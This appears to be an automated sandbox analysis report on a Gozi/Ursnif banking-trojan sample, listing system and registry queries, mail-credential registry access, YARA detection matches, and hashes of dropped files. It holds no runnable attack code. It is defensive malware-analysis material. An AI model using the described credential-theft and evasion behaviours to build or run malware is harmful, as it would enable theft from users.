Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 cpuid

8_2_010A42A6

Source: C:\Users\user\Desktop\gozi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

8_2_00401C44

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

8_2_010A42A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F1C557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

8_2_03F1C557

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

8_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Windows Analysis Report gozi.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	551701
Product:	CloudBasic
Start time:	13:00:19
Start date:	12.01.2022
Sample:	gozi.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8ee79738c37a919fdf38dc5a621556ce
SHA1:	ae35e761cd1633fa8b70bda3c2e3649c1694ffd1
SHA256:	51037666d1982db93e3123e88594d409805d3f1d970e9f926dcadb99f77f50f6
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log	ASCII text, with CRLF line terminators	3197B1D4714B56F2A6AC9E83761739AE	3B38010F0DF51C1D4D2C020138202DABB686741D	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\3B0F.bi1	ASCII text, with CRLF line terminators	1658AC427436559C818CE024565FC43B	8ECC6A8B9512D66EC9816669273CD2934075ADA8	6AE6B137C04602F2D9D5191E3F6E8F54FB4E9D1FA63C3061CCF909A30966ADDD
C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs	UTF-8 Unicode (with BOM) text	030386E2BD305EC55BEE50D72051A0C2	618FE858F3B7B1296E760EE21969463861B875E3	2DABA5D5466729FE4AD5753FBB2F95BC486F9AF12A59516BA175F6FF2062CE44
C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	058C6409B55A3272B281DD66A1836169	41EC7E456D84A1256A98B5C4A265A9FFB4E652B5	BDCE0FEF36E9B3E61B8C0FFA6AE77766B5E6D3491C48B3ED8ACFF6A6F08944B1
C:\Users\user\AppData\Local\Temp\5n300s0s.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	D946993F47784F9E8727577D58C6B065	853445BA684F35E59B89D0FD5EBC04A266394175	0FC0E5ED70D2AD453D22DA38C742970F1E390C4D44A69B6CF46A9C6CA102B845
C:\Users\user\AppData\Local\Temp\5n300s0s.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	FFBD7395F541E9292620BE41E7B60BC6	F88961F2BB9BB564D928AB202C079D199F8C2461	70BA1D1E6607E9F5C24E2B1B9644868ECC6F94D27F959582927FFCD83CF118EA
C:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP	MSVC .res	4DD4A6AF96C02C85FC1B4A3BCAF6D199	AF08B5DB30EDD73F8124F37CA13C1AB739511C7B	4CBD308EA2CEF31935CB7502488B37D1570A50CCF1C21E29A1755A28A9E3DF83
C:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP	MSVC .res	F17798721D9D8097A6CAFFCFE55C2B52	324AE9044C5E8CB1BDC3C4387D76E709CF2E2596	20111EB796E35ADE092F0EB11B0094ACD1ADF0E314FB3BCD00B18E6D6691CF4E
C:\Users\user\AppData\Local\Temp\RES73F8.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	E50591F2515FD6E3BEA0353DAB5D673A	DCB1415CF1CF92D75A6F7E84B69A0E3128C00F40	8148523D8A0A2E8A445C227BF54B7644D1383DF82EA251B69972597E0EFE5846
C:\Users\user\AppData\Local\Temp\RES8712.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols	3A3F3DA7DC5DB0BFDABCB2560F30248D	D3B2AE662A7577A2852CBCCC7DFDB1735197025B	49563F9489033AE40978A64856F6A6A87616F394F4D494D819A9CA9E4E8859BF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epyy1szg.01u.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\hscan34n.0.cs	UTF-8 Unicode (with BOM) text	F0B963F8AA00CA94A4AD66F311B988E2	37F7E8D69DDEA558DEFD0C10FF1157E26884E7EC	96038DB143062F959B6F1CA6944FCB0D291DA99881953ADE5A6BA02161CFA82A
